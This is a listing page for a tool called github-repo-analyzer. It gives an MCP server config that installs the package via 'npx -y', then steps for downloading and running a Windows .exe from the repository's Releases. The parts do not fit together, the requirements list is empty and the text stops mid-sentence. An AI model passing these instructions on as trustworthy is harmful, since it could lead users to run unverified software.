Barakuda989/github-repo-analyzer
Analyze GitHub repositories to display key metrics, language use, and contributor stats in a clear terminal interface.
Platform-specific configuration:
{
"mcpServers": {
"github-repo-analyzer": {
"command": "npx",
"args": [
"-y",
"github-repo-analyzer"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/Barakuda989/github-repo-analyzer)
---
github-repo-analyzer is a simple command-line tool that helps you understand any GitHub repository. It shows you information like language usage, commit history, and other key stats in clear, easy-to-read charts inside your terminal.
This tool works on Windows and does not require programming skills. You only need to follow a few steps to download, install, and use it.
---
Before installing, make sure your computer meets these minimum requirements:
---
You will get the tool from its official GitHub page. Follow these steps carefully.
Click the link below to visit the page where you can download github-repo-analyzer:
This link leads you to the main GitHub repository page.
Once on the page, look for the Releases section. It is usually found on the right side or near the top of the page. Alternatively, scroll down until you see a heading called Releases.
Click the latest release version. It will take you to a page with files to download.
On the latest release page, find the file that looks like this:
github-repo-analyzer-win.exeClick this file to download it. The file is an executable program for Windows.
Choose a folder on your computer to save it where you can easily find it, such
Loading reviews...